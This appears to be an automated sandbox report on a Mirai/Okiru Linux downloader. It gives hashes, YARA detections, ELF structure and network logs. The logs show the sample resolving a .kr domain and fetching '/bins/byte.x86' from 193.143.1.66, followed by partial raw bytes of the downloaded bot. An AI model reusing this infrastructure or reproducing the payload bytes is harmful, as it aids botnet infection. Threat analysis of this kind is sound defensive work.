        dlr.x86.elfGet hashmaliciousMirai, OkiruBrowse
        • /bins/byte.x86
        109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
        • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
        91.189.91.43byte.m68k.elfGet hashmaliciousMirai, OkiruBrowse
          dlr.sh4.elfGet hashmaliciousUnknownBrowse
            byte.mips.elfGet hashmaliciousMirai, OkiruBrowse
              na.elfGet hashmaliciousPrometeiBrowse
                na.elfGet hashmaliciousPrometeiBrowse
                  sshd.elfGet hashmaliciousUnknownBrowse
                    na.elfGet hashmaliciousPrometeiBrowse
                      na.elfGet hashmaliciousPrometeiBrowse
                        na.elfGet hashmaliciousPrometeiBrowse
                          xmrig.elfGet hashmaliciousXmrigBrowse
                            91.189.91.42byte.m68k.elfGet hashmaliciousMirai, OkiruBrowse
                              dlr.sh4.elfGet hashmaliciousUnknownBrowse
                                byte.mips.elfGet hashmaliciousMirai, OkiruBrowse
                                  na.elfGet hashmaliciousPrometeiBrowse
                                    na.elfGet hashmaliciousPrometeiBrowse
                                      sshd.elfGet hashmaliciousUnknownBrowse
                                        na.elfGet hashmaliciousPrometeiBrowse
                                          na.elfGet hashmaliciousPrometeiBrowse
                                            na.elfGet hashmaliciousPrometeiBrowse
                                              xmrig.elfGet hashmaliciousXmrigBrowse
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                krkrdoskslansldkalsd.o-r.krbyte.m68k.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 193.143.1.66
                                                dlr.arm6.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 193.143.1.66
                                                byte.mips.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 193.143.1.66
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                CANONICAL-ASGBbyte.m68k.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 91.189.91.42
                                                dlr.sh4.elfGet hashmaliciousUnknownBrowse
                                                • 91.189.91.42
                                                byte.mips.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 91.189.91.42
                                                na.elfGet hashmaliciousPrometeiBrowse
                                                • 91.189.91.42
                                                na.elfGet hashmaliciousPrometeiBrowse
                                                • 91.189.91.42
                                                sshd.elfGet hashmaliciousUnknownBrowse
                                                • 91.189.91.42
                                                na.elfGet hashmaliciousPrometeiBrowse
                                                • 91.189.91.42
                                                na.elfGet hashmaliciousPrometeiBrowse
                                                • 91.189.91.42
                                                na.elfGet hashmaliciousPrometeiBrowse
                                                • 91.189.91.42
                                                xmrig.elfGet hashmaliciousXmrigBrowse
                                                • 91.189.91.42
                                                CANONICAL-ASGBbyte.m68k.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 91.189.91.42
                                                dlr.sh4.elfGet hashmaliciousUnknownBrowse
                                                • 91.189.91.42
                                                byte.mips.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 91.189.91.42
                                                na.elfGet hashmaliciousPrometeiBrowse
                                                • 91.189.91.42
                                                na.elfGet hashmaliciousPrometeiBrowse
                                                • 91.189.91.42
                                                sshd.elfGet hashmaliciousUnknownBrowse
                                                • 91.189.91.42
                                                na.elfGet hashmaliciousPrometeiBrowse
                                                • 91.189.91.42
                                                na.elfGet hashmaliciousPrometeiBrowse
                                                • 91.189.91.42
                                                na.elfGet hashmaliciousPrometeiBrowse
                                                • 91.189.91.42
                                                xmrig.elfGet hashmaliciousXmrigBrowse
                                                • 91.189.91.42
                                                INIT7CHbyte.m68k.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 109.202.202.202
                                                dlr.sh4.elfGet hashmaliciousUnknownBrowse
                                                • 109.202.202.202
                                                byte.mips.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 109.202.202.202
                                                na.elfGet hashmaliciousPrometeiBrowse
                                                • 109.202.202.202
                                                na.elfGet hashmaliciousPrometeiBrowse
                                                • 109.202.202.202
                                                sshd.elfGet hashmaliciousUnknownBrowse
                                                • 109.202.202.202
                                                na.elfGet hashmaliciousPrometeiBrowse
                                                • 109.202.202.202
                                                na.elfGet hashmaliciousPrometeiBrowse
                                                • 109.202.202.202
                                                na.elfGet hashmaliciousPrometeiBrowse
                                                • 109.202.202.202
                                                xmrig.elfGet hashmaliciousXmrigBrowse
                                                • 109.202.202.202
                                                BITWEB-ASRUbyte.m68k.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 193.143.1.66
                                                dlr.arm6.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 193.143.1.66
                                                byte.mips.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 193.143.1.66
                                                http://app-antiriciclaggio-mps.com/dati.htmlGet hashmaliciousUnknownBrowse
                                                • 193.143.1.14
                                                1647911459241874440.jsGet hashmaliciousStrela DownloaderBrowse
                                                • 193.143.1.205
                                                21033090848109083.jsGet hashmaliciousStrela DownloaderBrowse
                                                • 193.143.1.205
                                                373320438246114031.jsGet hashmaliciousStrela DownloaderBrowse
                                                • 193.143.1.205
                                                1025029660567011705.jsGet hashmaliciousStrela DownloaderBrowse
                                                • 193.143.1.205
                                                31070304561863532281.jsGet hashmaliciousStrela DownloaderBrowse
                                                • 193.143.1.205
                                                1724730880967915900.jsGet hashmaliciousStrela DownloaderBrowse
                                                • 193.143.1.205
                                                No context
                                                No context
                                                Process:/tmp/dlr.x86.elf
                                                File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
                                                Category:dropped
                                                Size (bytes):75120
                                                Entropy (8bit):6.605332585907466
                                                Encrypted:false
                                                SSDEEP:1536:aSYXBbJKbFe5AQZqOtRjX1lxW7//S2xnLs+IJrF/DOn/YUTB/:ybIbFe5wOtB3k7XS2xLCJdinJt/
                                                MD5:68945C8D25A8717A3435259129C4924F
                                                SHA1:1F5D14AAC12A2DCA6F0F4F01007045325D43CDB6
                                                SHA-256:17529EC36BE870B9C139F4C7A5D09CE2B8A8C213423F5A28DBC830C7580AF4A4
                                                SHA-512:69D61F1E6077A45255A44F01BC25280E37ACAF66330318AC4998B248AE63F4BA30A28EC1E5FD0CCCBD85824740382C310A9336090072922EA148D4CE6E03840D
                                                Malicious:true
                                                Yara Hits:
                                                • Rule: JoeSecurity_Okiru, Description: Yara detected Okiru, Source: /tmp/byte, Author: Joe Security
                                                • Rule: JoeSecurity_Mirai_9, Description: Yara detected Mirai, Source: /tmp/byte, Author: Joe Security
                                                • Rule: Linux_Trojan_Mirai_fa3ad9d0, Description: unknown, Source: /tmp/byte, Author: unknown
                                                • Rule: Linux_Trojan_Mirai_b14f4c5d, Description: unknown, Source: /tmp/byte, Author: unknown
                                                • Rule: Linux_Trojan_Mirai_93fc3657, Description: unknown, Source: /tmp/byte, Author: unknown
                                                • Rule: Linux_Trojan_Mirai_804f8e7c, Description: unknown, Source: /tmp/byte, Author: unknown
                                                • Rule: Linux_Trojan_Mirai_99d78950, Description: unknown, Source: /tmp/byte, Author: unknown
                                                • Rule: Linux_Trojan_Mirai_a68e498c, Description: unknown, Source: /tmp/byte, Author: unknown
                                                • Rule: Linux_Trojan_Mirai_88de437f, Description: unknown, Source: /tmp/byte, Author: unknown
                                                • Rule: Linux_Trojan_Mirai_ae9d0fa6, Description: unknown, Source: /tmp/byte, Author: unknown
                                                • Rule: Linux_Trojan_Mirai_389ee3e9, Description: unknown, Source: /tmp/byte, Author: unknown
                                                • Rule: Linux_Trojan_Mirai_cc93863b, Description: unknown, Source: /tmp/byte, Author: unknown
                                                • Rule: Linux_Trojan_Mirai_8aa7b5d3, Description: unknown, Source: /tmp/byte, Author: unknown
                                                • Rule: Mirai_Botnet_Malware, Description: Detects Mirai Botnet Malware, Source: /tmp/byte, Author: Florian Roth
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                Reputation:low
                                                Preview:.ELF....................d...4....#......4. ...(..........................................................3..........Q.td............................U..S.......7'...h.......[]..$............U.....=.....t..5................u.......t....h.......................&....U..............Z..&....t.Rj.h....h......~...........t........t....h...........1.^....PTRhVj..h....QVh...................UWVS..l-....$.-....$.-....$.-.........D$...j.j.SR.*....D$0j.j.SV.+2.... ..D$ ..t.....D$,P.a.........~...l-..[^_].......~......PPh....U......D$,.............L$..D$4...........L$0.G.........T$4......|$0..$.-....R.4.F..G.PP.D$(P......P........~..w*.^..{..f......f...1.N.....f......f....G..{...........T$...$.L$...........).)...w7.$..j.....jH....Y[j.jH.#...^ZP.G.P.g.....$H....;.......\$4.....C.\$49l$4.......D$...$@,....$.,......T$..L$..D$....j..... ....D$8..1..|$ ...|$.......~.t$.1..D$$.....T<...X...<..."...<...{...<... ....F.............,...F.;D$$~..t&.@.D$$G.....9........F.<
                                                File type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
                                                Entropy (8bit):6.231776041470541
                                                TrID:
                                                • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                                                • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                                                File name:dlr.x86.elf
                                                File size:18'056 bytes
                                                MD5:3cd1a6dd920504f427b843a85df3bfaf
                                                SHA1:464baee3d2dbd00f2e821de23b0e636f259e48d1
                                                SHA256:6253a2fc1592cb56b4e02fb49e203fede42d16cf8c3d1825bba771b966adc37d
                                                SHA512:2d7e4f34cd324db679bc26f99420f4a548e5ef3e206e39fb291922ce97e2f9908e3a0a305c959cb4c6abdc21c8873ea7724316a2a131b914a38e84a0396fe7a7
                                                SSDEEP:384:fmmE1LA9WxC0A6KydedHAJsO3hydo81tQCgKZu9xhGr:upxPAw01ORydo8/HZ+xhq
                                                TLSH:BB822942AA83D875DC6313B5DA7BAB026732E979F406FE46C77E1A318C12110872775E
                                                File Content Preview:.ELF....................)...4....E......4. ...(......................C...C...............C..............x'..........Q.td............................U......u.j...........U......u.j..{.....U......u..u..u.j..c.....U......E..E..E..E..E..E..E.Pj.jf.<.....U....

                                                ELF header

                                                Class:ELF32
                                                Data:2's complement, little endian
                                                Version:1 (current)
                                                Machine:Intel 80386
                                                Version Number:0x1
                                                Type:EXEC (Executable file)
                                                OS/ABI:UNIX - System V
                                                ABI Version:0
                                                Entry Point Address:0x8048329
                                                Flags:0x0
                                                ELF Header Size:52
                                                Program Header Offset:52
                                                Program Header Size:32
                                                Number of Program Headers:3
                                                Section Header Offset:17816
                                                Section Header Size:40
                                                Number of Section Headers:6
                                                Header String Table Index:5
                                                NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                NULL0x00x00x00x00x0000
                                                .textPROGBITS0x80480940x940x39c10x00x6AX004
                                                .rodataPROGBITS0x804ba600x3a600x9800x00x2A0032
                                                .dataPROGBITS0x804d3e00x43e00x1940x00x3WA0032
                                                .bssNOBITS0x804d5800x45740x25d80x00x3WA0032
                                                .shstrtabSTRTAB0x00x45740x240x00x0001
                                                TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                LOAD0x00x80480000x80480000x43e00x43e06.32590x5R E0x1000.text .rodata
                                                LOAD0x43e00x804d3e00x804d3e00x1940x27781.50500x6RW 0x1000.data .bss
                                                GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                                                TimestampSource PortDest PortSource IPDest IP
                                                Jan 16, 2025 05:47:51.738044024 CET43928443192.168.2.2391.189.91.42
                                                Jan 16, 2025 05:47:52.286367893 CET3860680192.168.2.23193.143.1.66
                                                Jan 16, 2025 05:47:52.291290998 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:52.291347980 CET3860680192.168.2.23193.143.1.66
                                                Jan 16, 2025 05:47:52.291871071 CET3860680192.168.2.23193.143.1.66
                                                Jan 16, 2025 05:47:52.296767950 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:52.975430012 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:52.975486040 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:52.975521088 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:52.975557089 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:52.975589991 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:52.975610018 CET3860680192.168.2.23193.143.1.66
                                                Jan 16, 2025 05:47:52.975610018 CET3860680192.168.2.23193.143.1.66
                                                Jan 16, 2025 05:47:52.975610018 CET3860680192.168.2.23193.143.1.66
                                                Jan 16, 2025 05:47:52.975610018 CET3860680192.168.2.23193.143.1.66
                                                Jan 16, 2025 05:47:52.975625038 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:52.975658894 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:52.975692987 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:52.975727081 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:52.975761890 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:52.975783110 CET3860680192.168.2.23193.143.1.66
                                                Jan 16, 2025 05:47:52.975783110 CET3860680192.168.2.23193.143.1.66
                                                Jan 16, 2025 05:47:52.975783110 CET3860680192.168.2.23193.143.1.66
                                                Jan 16, 2025 05:47:52.975783110 CET3860680192.168.2.23193.143.1.66
                                                Jan 16, 2025 05:47:52.975783110 CET3860680192.168.2.23193.143.1.66
                                                Jan 16, 2025 05:47:52.975816011 CET3860680192.168.2.23193.143.1.66
                                                Jan 16, 2025 05:47:52.980592012 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:52.980631113 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:52.980657101 CET3860680192.168.2.23193.143.1.66
                                                Jan 16, 2025 05:47:52.980705976 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:52.980756998 CET3860680192.168.2.23193.143.1.66
                                                Jan 16, 2025 05:47:52.980792046 CET3860680192.168.2.23193.143.1.66
                                                Jan 16, 2025 05:47:53.096373081 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.096409082 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.096436977 CET3860680192.168.2.23193.143.1.66
                                                Jan 16, 2025 05:47:53.096446991 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.096472025 CET3860680192.168.2.23193.143.1.66
                                                Jan 16, 2025 05:47:53.096491098 CET3860680192.168.2.23193.143.1.66
                                                Jan 16, 2025 05:47:53.096566916 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.096601009 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.096635103 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.096924067 CET3860680192.168.2.23193.143.1.66
                                                Jan 16, 2025 05:47:53.096978903 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.097012997 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.097048044 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.097285986 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.097358942 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.097393036 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.097429037 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.097899914 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.097934008 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.097969055 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.098004103 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.098040104 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.098231077 CET3860680192.168.2.23193.143.1.66
                                                Jan 16, 2025 05:47:53.098716021 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.098769903 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.098805904 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.098841906 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.098875999 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.099111080 CET3860680192.168.2.23193.143.1.66
                                                Jan 16, 2025 05:47:53.101269960 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.101325035 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.101416111 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.102328062 CET3860680192.168.2.23193.143.1.66
                                                Jan 16, 2025 05:47:53.183126926 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.217370033 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.217406034 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.217441082 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.217475891 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.217509985 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.217542887 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.217595100 CET3860680192.168.2.23193.143.1.66
                                                Jan 16, 2025 05:47:53.217639923 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.217677116 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.217710018 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.217745066 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.217777967 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.217880964 CET3860680192.168.2.23193.143.1.66
                                                Jan 16, 2025 05:47:53.218033075 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.218067884 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.218120098 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.218153000 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.218187094 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.218220949 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.218480110 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.218509912 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.220227003 CET3860680192.168.2.23193.143.1.66
                                                Jan 16, 2025 05:47:53.222651958 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.222685099 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.222719908 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.222775936 CET3860680192.168.2.23193.143.1.66
                                                Jan 16, 2025 05:47:53.222832918 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.222867012 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.222901106 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.222934961 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.222968102 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.225204945 CET3860680192.168.2.23193.143.1.66
                                                Jan 16, 2025 05:47:53.442848921 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.442965031 CET3860680192.168.2.23193.143.1.66
                                                Jan 16, 2025 05:47:53.479065895 CET3860680192.168.2.23193.143.1.66
                                                Jan 16, 2025 05:47:53.484313965 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.484359980 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.484399080 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:53.484508038 CET3860680192.168.2.23193.143.1.66
                                                Jan 16, 2025 05:47:55.396673918 CET3860680192.168.2.23193.143.1.66
                                                Jan 16, 2025 05:47:55.401582003 CET8038606193.143.1.66192.168.2.23
                                                Jan 16, 2025 05:47:57.113287926 CET42836443192.168.2.2391.189.91.43
                                                Jan 16, 2025 05:47:58.649089098 CET4251680192.168.2.23109.202.202.202
                                                Jan 16, 2025 05:48:13.495333910 CET43928443192.168.2.2391.189.91.42
                                                Jan 16, 2025 05:48:23.733741999 CET42836443192.168.2.2391.189.91.43
                                                Jan 16, 2025 05:48:29.876714945 CET4251680192.168.2.23109.202.202.202
                                                Jan 16, 2025 05:48:54.449330091 CET43928443192.168.2.2391.189.91.42
                                                TimestampSource PortDest PortSource IPDest IP
                                                Jan 16, 2025 05:47:51.250850916 CET4793853192.168.2.231.1.1.1
                                                Jan 16, 2025 05:47:52.285075903 CET53479381.1.1.1192.168.2.23
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Jan 16, 2025 05:47:51.250850916 CET192.168.2.231.1.1.10x6b10Standard query (0)krkrdoskslansldkalsd.o-r.krA (IP address)IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Jan 16, 2025 05:47:52.285075903 CET1.1.1.1192.168.2.230x6b10No error (0)krkrdoskslansldkalsd.o-r.kr193.143.1.66A (IP address)IN (0x0001)false
                                                Session IDSource IPSource PortDestination IPDestination Port
                                                0192.168.2.2338606193.143.1.6680
                                                TimestampBytes transferredDirectionData
                                                Jan 16, 2025 05:47:52.291871071 CET45OUTGET /bins/byte.x86 HTTP/1.0
                                                Data Raw: 00 62
                                                Data Ascii: b
                                                Jan 16, 2025 05:47:52.975430012 CET711INHTTP/1.0 200 OK
                                                Accept-Ranges: bytes
                                                Content-Length: 75120
                                                Content-Type: application/octet-stream
                                                Last-Modified: Thu, 16 Jan 2025 04:05:53 GMT
                                                Date: Thu, 16 Jan 2025 04:47:52 GMT
                                                Data Raw: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 02 00 03 00 01 00 00 00 64 81 04 08 34 00 00 00 e0 23 01 00 00 00 00 00 34 00 20 00 03 00 28 00 0a 00 09 00 01 00 00 00 00 00 00 00 00 80 04 08 00 80 04 08 bc 17 01 00 bc 17 01 00 05 00 00 00 00 10 00 00 01 00 00 00 c0 17 01 00 c0 a7 05 08 c0 a7 05 08 e0 0b 00 00 e0 33 00 00 06 00 00 00 00 10 00 00 51 e5 74 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 04 00 00 00 55 89 e5 53 e8 13 00 00 00 81 c3 37 27 01 00 e8 68 00 00 00 e8 83 e9 00 00 5b 5d c3 8b 1c 24 c3 90 90 90 90 90 90 90 90 90 90 90 90 55 89 e5 83 ec 08 80 3d a0 b3 05 08 00 74 0c eb 35 83 c0 04 a3 e4 a7 05 08 ff d2 a1 e4 a7 05 08 8b 10 85 d2 75 eb b8 00 00 00 00 85 c0 74 10 83 ec 0c 68 bc 97 05 08 e8 04 7f fb f7 83 c4 10 c6 05 a0 b3 05 08 01 c9 c3 90 8d b4 26 00 00 00 00 55 b8 00 00 00 00 89 e5 83 ec 08 e8 00 00 00 00 5a 81 c2 b4 26 01 00 85 c0 74 15 52 6a 00 68 a4 b3 05 08 68 bc 97 05 08 e8 c3 7e fb f7 83 c4 10 a1 d0 a7 05 08 85 c0 74 16 b8 00 00 00 00 85 c0 74 0d [TRUNCATED]
                                                Data Ascii: ELFd4#4 (3QtdUS7'h[]$U=t5uth&UZ&tRjhh~tth1^PTRhVjhQVhUWVSl-$-$-$-D$jjSR*.D$0jjSV+2 D$ tD$,Pa~l-[^_
                                                Jan 16, 2025 05:47:52.975486040 CET1236INData Raw: 5d c3 89 dd 81 fb f4 01 00 00 7e 05 bd f4 01 00 00 50 50 68 9c 02 00 00 55 e8 1b c1 00 00 89 44 24 2c 89 c7 83 c4 10 85 ed 0f 8e 02 01 00 00 8a 4c 24 1b c7 44 24 34 00 00 00 00 81 e1 ff 00 00 00 89 4c 24 30 c6 47 04 00 c7 07 ff ff ff ff 8b 54 24
                                                Data Ascii: ]~PPhUD$,L$D$4L$0GT$4|$0$-R4FGPPD$(PP~w*^{ff1NffG{T$$L$))w7$jjHY
                                                Jan 16, 2025 05:47:52.975521088 CET1236INData Raw: 00 8d 44 24 4b 50 e8 0d 90 00 00 5b 8d 54 24 4b 52 e8 72 8f 00 00 5a 59 68 80 6a 05 08 8d 4c 24 4b 8d 04 01 50 e8 7e 8f 00 00 5b 8d 44 24 4b 50 e8 53 8f 00 00 5a 59 6a 10 8d 54 24 4b 8d 04 02 50 e8 c2 77 00 00 5b 8d 4c 24 4b 51 e8 37 8f 00 00 5a
                                                Data Ascii: D$KP[T$KRrZYhjL$KP~[D$KPSZYjT$KPw[L$KQ7ZYhjT$KPC[L$KQZVYRT$KP%[L$KQZYhjT$KP[L$KQZYRT$KPXL$KQY[hjT$KP$9XZjj
                                                Jan 16, 2025 05:47:52.975557089 CET1236INData Raw: 83 c4 20 0b 84 24 58 2d 00 00 75 28 8b 0b c6 43 04 04 e9 bf f9 ff ff 68 00 40 00 00 6a 03 68 b0 6a 05 08 8b 56 f0 52 e8 d1 ad 00 00 83 c4 10 e9 ea fe ff ff 83 ec 0c 8b 03 50 e8 a4 8f 00 00 83 c4 10 c7 03 ff ff ff ff c6 43 04 00 e9 a0 f9 ff ff 83
                                                Data Ascii: $X-u(Ch@jhjVRPCjIzY[jjI*z^ZPGPn$IBzjJzY[jjJy^ZPGP9$JzjK{zY[jjKy^ZPGP$Ky
                                                Jan 16, 2025 05:47:52.975589991 CET1236INData Raw: 00 00 e8 71 76 00 00 c7 04 24 41 00 00 00 e8 65 76 00 00 c7 04 24 42 00 00 00 e8 59 76 00 00 c7 04 24 43 00 00 00 e8 4d 76 00 00 c7 04 24 44 00 00 00 e8 41 76 00 00 c7 04 24 45 00 00 00 e8 35 76 00 00 c7 04 24 46 00 00 00 e8 29 76 00 00 c7 04 24
                                                Data Ascii: qv$Aev$BYv$CMv$DAv$E5v$F)v$Gv_XhDt$|VuD$@\$p)1L$XF|$X$QR<T$$GFQQD$HPRJ/t,D$0PPD$,P
                                                Jan 16, 2025 05:47:52.975625038 CET1236INData Raw: 81 00 00 5b 8d 8c 24 90 28 00 00 51 e8 1f 81 00 00 5a 8d 57 14 59 52 8d 94 24 90 28 00 00 8d 04 02 50 e8 29 81 00 00 5b 8d 8c 24 90 28 00 00 51 e8 fb 80 00 00 5a 59 68 a7 6a 05 08 8d 94 24 90 28 00 00 8d 04 02 50 e8 04 81 00 00 5b 8d 8c 24 90 28
                                                Data Ascii: [$(QZWYR$(P)[$(QZYhj$(P[$(QZYR$(PX$(QY[hj$(P$9qXZjj9QpX$(QqZYS$(P~$9RpX$(QDY[hj
                                                Jan 16, 2025 05:47:52.975658894 CET1236INData Raw: fa ff ff 29 d8 83 f8 1e 0f 87 ad f8 ff ff 8b 86 60 fa ff ff 89 c2 83 e0 1f c1 ea 05 0f ab 84 94 84 50 00 00 8b 86 60 fa ff ff 39 44 24 48 0f 8d aa f8 ff ff e9 07 fa ff ff 8b 44 24 48 85 c0 0f 84 fc f7 ff ff c7 84 24 98 51 00 00 00 00 00 00 c7 84
                                                Data Ascii: )`P`9D$HD$H$Q$Q$QPj$PR$QQD$dPj$D$D$,D$\aQt"T$\X<<#<T$,D
                                                Jan 16, 2025 05:47:52.975692987 CET860INData Raw: 3c 7a 00 00 83 c4 10 89 c3 80 bc 04 83 00 00 00 20 0f 94 c0 8d b4 24 83 00 00 00 25 ff 00 00 00 6a 02 68 c6 6a 05 08 01 c3 8b 44 24 70 29 d8 01 de 50 56 e8 18 78 00 00 83 c4 10 89 c2 83 f8 ff 74 2d 83 f8 01 7e 03 83 ea 02 8d 84 24 a8 51 00 00 01
                                                Data Ascii: <z $%jhjD$p)PVxt-~$QPPjV;xL$lA1PPjj@f$Pl$pUSy@T$\zPPjj@fPD$pPSzyT$| M|$h,)j)hjWU
                                                Jan 16, 2025 05:47:52.975727081 CET1236INData Raw: c5 c0 05 00 00 89 c7 8d b1 44 08 00 00 81 ba 94 02 00 00 00 04 00 00 0f 84 29 01 00 00 8b 44 24 5c c7 07 00 00 00 00 8b 90 94 02 00 00 b8 00 04 00 00 29 d0 68 00 40 00 00 8d 14 16 50 52 8b 54 24 68 8b 82 54 fa ff ff 50 e8 c9 96 00 00 83 c4 10 85
                                                Data Ascii: D)D$\)h@PRT$hTP/T$\L$t\9~T$\)B:L$\Au!ycL$\)AjtNT$\)RPPVL
                                                Jan 16, 2025 05:47:52.975761890 CET1236INData Raw: 8b 9c 24 b0 51 00 00 01 d8 50 e8 79 6f 00 00 83 c4 0c 68 d0 6a 05 08 50 8b 8c 24 b0 51 00 00 89 f0 01 c8 50 e8 ff 71 00 00 8b 94 24 b4 51 00 00 01 c2 89 94 24 b4 51 00 00 83 c4 10 8b 84 24 a4 51 00 00 80 3c 06 22 0f 84 21 05 00 00 50 50 6a 0a 56
                                                Data Ascii: $QPyohjP$QPq$Q$Q$Q<"!PPjV1p@w&\$tjOjv9r$QSnhjPS{qc;/T$LGETL$\X-D$\@gjh
